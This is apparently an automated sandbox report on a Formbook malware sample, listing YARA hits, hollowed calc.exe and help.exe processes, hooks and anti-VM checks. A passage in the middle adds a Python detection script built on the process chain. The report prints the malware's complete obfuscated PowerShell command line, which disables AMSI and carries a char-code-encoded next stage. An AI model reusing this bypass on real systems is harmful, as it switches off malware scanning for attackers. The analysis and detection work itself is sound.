          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041E94D
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041D1F1
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041DA23
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041DB36
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00402D89
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041BE22
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00409E30
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03472B28
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033DEBB0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_034722AE
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033AF900
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03461002
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033BB090
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_034720A8
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03471FF1
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033C6E30
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03472EF7
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03471D55
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033A0D20
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03472D07
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033D2581
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033BD5E0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033B841F
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AA6E30
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ABEBB0
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A9B090
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02B41002
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A9841F
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A9D5E0
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A80D20
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A8F900
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02B51D55
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BD84E
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BE066
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BE94D
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BDA23
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BDB36
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001A2D90
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001A2D89
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001A9E30
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BBE22
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001A2FB0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 033AB150 appears 35 times
          Source: C:\Windows\SysWOW64\help.exe | Code function: String function: 02A8B150 appears 32 times
          Source: s2rsXUiUn8.exe | Static PE information: Number of sections : 11 > 10
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/6@5/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210722
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: s2rsXUiUn8.exe | Metadefender: Detection: 17%
          Source: s2rsXUiUn8.exe | ReversingLabs: Detection: 57%
          Source: unknown | Process created: C:\Users\user\Desktop\s2rsXUiUn8.exe 'C:\Users\user\Desktop\s2rsXUiUn8.exe'
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@( [char-code array omitted]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,1
05,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
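          The process chain the report records here (64-bit powershell.exe creating the 32-bit C:\Windows\SysWOW64\calc.exe, and help.exe spawning cmd.exe /c del on a copy of calc.exe in SysWOW64) is what a detection engineer would want to turn into rules. The Python below is an added example and not part of the report or the sandbox's tooling: it runs three rules over constructed process-creation events modelled on this chain. The event field names (pid, ppid, image, cmdline), the benign control events, the abbreviated PowerShell command line and the unknown parent of help.exe (ppid 99, since this part of the report does not show it) are all assumptions.

```python
import re

# Constructed sample process events modelled on the chain in this report:
# s2rsXUiUn8.exe -> powershell.exe -> calc.exe, and help.exe -> cmd.exe /c del.
# Field names are generic; map your own EDR or Sysmon event fields onto them.
# help.exe's parent is not shown in this part of the report, so ppid 99 is a
# placeholder for an unknown parent. Events 6 and 7 are benign controls.
_STAGE2_TEXT = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)")
# Abbreviated, constructed stand-in for the report's command line: it keeps the
# raw fragments that the string-splitting obfuscation leaves untouched.
PS_CMDLINE = (
    "Powershell $t=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'"
    "+'n.A'+'m'+'si'+'Utils');$f=$t.GetField($n,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');"
    "$f.SetValue($null,$true);$s=@(" + ",".join(str(ord(c)) for c in _STAGE2_TEXT) + ")"
)
EVENTS = [
    {"pid": 1, "ppid": 0,  "image": r"C:\Users\user\Desktop\s2rsXUiUn8.exe", "cmdline": "s2rsXUiUn8.exe"},
    {"pid": 2, "ppid": 1,  "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": PS_CMDLINE},
    {"pid": 3, "ppid": 2,  "image": r"C:\Windows\SysWOW64\calc.exe", "cmdline": r"C:\Windows\SysWOW64\calc.exe"},
    {"pid": 4, "ppid": 99, "image": r"C:\Windows\SysWOW64\help.exe", "cmdline": r"C:\Windows\SysWOW64\help.exe"},
    {"pid": 5, "ppid": 4,  "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r"/c del 'C:\WINDOWS\syswow64\calc.exe'"},
    {"pid": 6, "ppid": 0,  "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 7, "ppid": 6,  "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"/c del C:\Users\user\notes.txt"},
]

WOW64_DIR = "c:\\windows\\syswow64\\"
WINDOWS_BIN_DIRS = (WOW64_DIR, "c:\\windows\\system32\\")
# Fragments that survive the string-splitting obfuscation unchanged in the report's command line.
AMSI_RAW_FRAGMENTS = ("[ref].assembly.gettype(", ".setvalue($null,$true)")
# An @( ... ) array of at least 50 small integers: the encoded next stage.
CHARCODE_ARRAY = re.compile(r"@\((?:\d{1,3},){49,}\d{1,3}\)")
DEL_TARGET = re.compile(r"\bdel\b\s+['\"]?([^'\"]+)", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_events(events):
    """Return (rule, pid) pairs for events matching the three behaviours."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        image = str(e["image"]).lower()
        cmdline = str(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        # R1: 64-bit PowerShell creating a 32-bit system binary (the hollowing host here).
        if parent and _basename(parent["image"]) == "powershell.exe" and image.startswith(WOW64_DIR):
            hits.append(("powershell_spawns_wow64_binary", e["pid"]))
        # R2: cmd.exe deleting a file under a Windows binary directory (the dropped host is removed).
        if _basename(image) == "cmd.exe":
            m = DEL_TARGET.search(cmdline)
            if m and m.group(1).lower().startswith(WINDOWS_BIN_DIRS):
                hits.append(("del_of_windows_binary", e["pid"]))
        # R3: reflective AmsiUtils tampering plus an embedded char-code payload.
        low = cmdline.lower()
        if (_basename(image) == "powershell.exe"
                and all(f in low for f in AMSI_RAW_FRAGMENTS)
                and CHARCODE_ARRAY.search(cmdline)):
            hits.append(("amsi_bypass_indicators", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in flag_events(EVENTS):
        print(f"{rule}: pid {pid} {EVENTS[pid - 1]['image']}")
```

          R1 will also fire on legitimate 64-bit PowerShell launching 32-bit tooling, so it belongs in a correlation with R2 or R3 (or with the injection signatures elsewhere in this report) rather than alerting on its own; R3 keys on the two fragments the obfuscator left in clear text, which a different builder may split as well.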
          Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: calc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp

          Data Obfuscation:

          Obfuscated command line found
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,1
05,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: s2rsXUiUn8.exe Static PE information: section name: .xdata
          Source: s2rsXUiUn8.exe Static PE information: section name: .vmp0
          Source: s2rsXUiUn8.exe Static PE information: section name: .cobf
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041682D push es; retf
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0040102E push esp; iretd
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041A1B1 push ecx; iretd
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041CEFB push eax; ret
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041CF5C push eax; ret
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_004177B7 push ebp; retf
          Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033FD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ADD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B682D push es; retf
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BA1B1 push ecx; iretd
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BD4A2 push FFFFFFB8h; retf
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BCEA5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BCEFB push eax; ret
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BCEF2 push eax; ret
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BCF5C push eax; ret
          Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B77B7 push ebp; retf
          Source: initial sample Static PE information: section name: .vmp0 entropy: 7.19991970418

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (this entry is repeated 95 times in the report)
          Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
